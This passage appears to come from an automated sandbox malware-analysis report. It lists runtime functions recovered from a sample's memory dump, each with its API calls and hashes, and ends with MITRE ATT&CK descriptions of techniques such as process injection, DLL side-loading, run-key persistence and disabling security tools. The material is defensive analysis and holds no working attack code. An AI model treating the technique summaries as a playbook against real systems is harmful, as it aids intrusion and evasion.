Instruction ID: ff26c1c1485af013368e001f5bc4d6890e98318e58dc556e4815fb2025fb6a12
Opcode Fuzzy Hash: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
Instruction Fuzzy Hash: 4AD16B75E04648DFCB16CFA8D8809ADBBF9FF49310F24452AE456EB352D730A946CB50

Function 0033D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0033D976
___AdjustPointer.LIBCMT ref: 0033D999
___AdjustPointer.LIBCMT ref: 0033DA35

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
Instruction ID: 73d27788cc7b1538f42214c9b23418ce1bd0bdafee5620fa0bd44376dcdd11d5
Opcode Fuzzy Hash: 0cc05b05e44073f234892ba2de31e5f7d0fda9845f41aac7e7875cc3a945623c
Instruction Fuzzy Hash: 86510472A04606AFDB2B9F14E8C1B7AB7B4FF01311F15412DE8429B6A1E731ED80CB90

Function 00343537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0034359B
__dosmaperr.LIBCMT ref: 003435A2
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 003435DC
__dosmaperr.LIBCMT ref: 003435E3

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
Instruction ID: 6a25f544a8b9b1920370be5020e40ff272eafe5c8c813a8f76c5a6d121860de0
Opcode Fuzzy Hash: 82b7aec3c82a4419c36cbb69558017271dee84ca6fb82889816c02f2922bca46
Instruction Fuzzy Hash: 9A21A471600605AFDB23AF66988182ABBECFF01364B118559F8659F651DB30FF508B91

Function 00338042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
Instruction ID: d31d615f1226ce521cfc43d5649b81497c4eff1d6395b28d64e41bff67f054ff
Opcode Fuzzy Hash: b0bc5bb96e1696a756c57f365d3bef71fb55f788b86603f234616493c0c017e6
Instruction Fuzzy Hash: DC21DCB1604705BFDB27AF618CC092AB7ACAF00364F118628F8699B651EF30EC0087A1

Function 0034484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00344857

Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0034488F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003448AF

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 6ecd8a2bdc729e17d0cdbc6dfeb45154bf633c6eadb4870ee11a4105681f2507
Instruction ID: 2e50263731bb21d20e5fe0fa46e9942daa594fde1c7e61aca3e97969d86c41e7
Opcode Fuzzy Hash: 6ecd8a2bdc729e17d0cdbc6dfeb45154bf633c6eadb4870ee11a4105681f2507
Instruction Fuzzy Hash: 981126F65026657FA71327B69CCEEBF29ACDE853D5B200434F401D9141FB65EE0192B1

Function 0034A4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000), ref: 0034A4F7
GetLastError.KERNEL32(?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?,?,00345365,00000000), ref: 0034A503

Part of subcall function 0034A554: CloseHandle.KERNEL32(FFFFFFFE,0034A513,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?,?), ref: 0034A564

___initconout.LIBCMT ref: 0034A513

Part of subcall function 0034A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0034A4D1,00349AFC,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A548

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00349B0F,00000000,00000001,00000000,?,?,00345A1F,?,00000000,00000000,?), ref: 0034A528

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
Instruction ID: 850bfd324bc36171fc1b49dcc2a228f530fc84bd8c28ae0f736ecb2d530f0839
Opcode Fuzzy Hash: 0e6bf7ff794dd99a039000b700b24ef6fde8d777093f90fce66060c619b5ce20
Instruction Fuzzy Hash: 6CF03036050715BFCF231F95EC0999E3F6AFF893A2F014550FA498E130D63299209B92

Function 003359A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 003359B9
GetCurrentThreadId.KERNEL32 ref: 003359C8
GetCurrentProcessId.KERNEL32 ref: 003359D1
QueryPerformanceCounter.KERNEL32(?), ref: 003359DE

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
Instruction ID: 7b426bf5a424b9a96f28fbde2b07c0eec278c19cad0528da278e384c862c67df
Opcode Fuzzy Hash: 78749b24a949dfd4949240d1e60ba3c287da9ea0bbdcc9fa4d1d55dde0fc50a2
Instruction Fuzzy Hash: 37F0AF70D1120CEBCB01DBB4C94999EFBF8FF1C301B914996A412E7120E730AB448F50

Function 00342117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?,?), ref: 003421D6
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00339266,?,?,?,00000055,?,-00000050,?,?), ref: 0034220D

Strings

utf8, xrefs: 003422DF

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
Instruction ID: 59f9495555860252f8a5d90802b8655cacd655d99ea89ac804bf5ff454a55345
Opcode Fuzzy Hash: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
Instruction Fuzzy Hash: 6A51E675640305AADB27AB748C82BAB73E8EF44740F960429FA45FF181FBB4F9408661

Function 0033DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0033DEAD,?,?,00000000,00000000,00000000,?), ref: 0033DFD1

Strings

MOC, xrefs: 0033DFE3
RCC, xrefs: 0033DFEB

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
Instruction ID: 6832b44ba00bb5470a1a0579ed5b7a189e2c35d06e17bdeb6d710891df54f431
Opcode Fuzzy Hash: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
Instruction Fuzzy Hash: EB416A75900209AFCF2ADF99DCC1AEEBBB5FF48304F198059FA04AB2A1D3759950DB50

Function 00341E7B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0033E4F7: HeapFree.KERNEL32(00000000,00000000,?,00341A55,?,00000000,?,?,003416F5,?,00000007,?,?,0034203B,?,?), ref: 0033E50D
Part of subcall function 0033E4F7: GetLastError.KERNEL32(?,?,00341A55,?,00000000,?,?,003416F5,?,00000007,?,?,0034203B,?,?), ref: 0033E518

___free_lconv_mon.LIBCMT ref: 00341EBF

Strings

TY5, xrefs: 00341E91
8Z5, xrefs: 00341F67

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorFreeHeapLast___free_lconv_mon
String ID: 8Z5$TY5
API String ID: 4068849827-3139154967
Opcode ID: e24d61745a870e77fe1a009d48e54452870693cdf4f975e47738d1bac3dcb157
Instruction ID: 3a1a9fcf2d6d46d66265a616a92b56bbb6ae7111d3ecd9f767456990f2d8aab8
Opcode Fuzzy Hash: e24d61745a870e77fe1a009d48e54452870693cdf4f975e47738d1bac3dcb157
Instruction Fuzzy Hash: 1E316D32600A019FDB23AA79D949B6677E8EF04750F114A19E855DF191DF74FCC5CB10

Function 0033D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0033DA8F

Strings

csm, xrefs: 0033DB22
csm, xrefs: 0033DAB1

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
Instruction ID: 38b9783ec555db0397c5be45d1619ac59bbb7b2c94dfcf46af2d65e70c71819e
Opcode Fuzzy Hash: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
Instruction Fuzzy Hash: 2931D336904358EBCF239F50ECC09AABB65FF08366F1A415AF8544A221C332DDA1DB91

Function 003329C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334B74
___raise_securityfailure.LIBCMT ref: 00334C5C

Strings

xf5, xrefs: 00334C57

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf5
API String ID: 3761405300-3233278200
Opcode ID: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
Instruction ID: ae0045f139252531c4e8317b9b3654f9b0213b535595028786e2403dd990333f
Opcode Fuzzy Hash: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
Instruction Fuzzy Hash: F121BCB45013009BE742CF25E996A447BF8FB4C71AF90A12AE5098B2B0E3B1A981CF44

Function 00334A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334A97
___raise_securityfailure.LIBCMT ref: 00334B54

Strings

xf5, xrefs: 00334B4F

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf5
API String ID: 3761405300-3233278200
Opcode ID: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
Instruction ID: 49955a5a2f8e361df205bd5cda239a701fc750f7933f95105447d64667ecc4bd
Opcode Fuzzy Hash: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
Instruction Fuzzy Hash: 79117CB45113049FD742DF29E9926847BF8FB5C30AF81A16AE8098B3B0E7B1A941DF45

Function 003329D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(0035648C,ios_base::badbit set,?,?,00331C84,00356478,00331B17), ref: 003329DF
ReleaseSRWLockExclusive.KERNEL32(0035648C,?,?,00331C84,00356478,00331B17), ref: 00332A19

Strings

ios_base::badbit set, xrefs: 003329D8

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ios_base::badbit set
API String ID: 17069307-3882152299
Opcode ID: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
Instruction ID: c68281c861aa9789a1de3e04c7269859f17442c06503819a2f82e2d8ebc08e7c
Opcode Fuzzy Hash: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
Instruction Fuzzy Hash: 62F0A034500200DFCB22AF19E884B26BBBCFB85776F10032EE89A476B0CB312842CA51

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
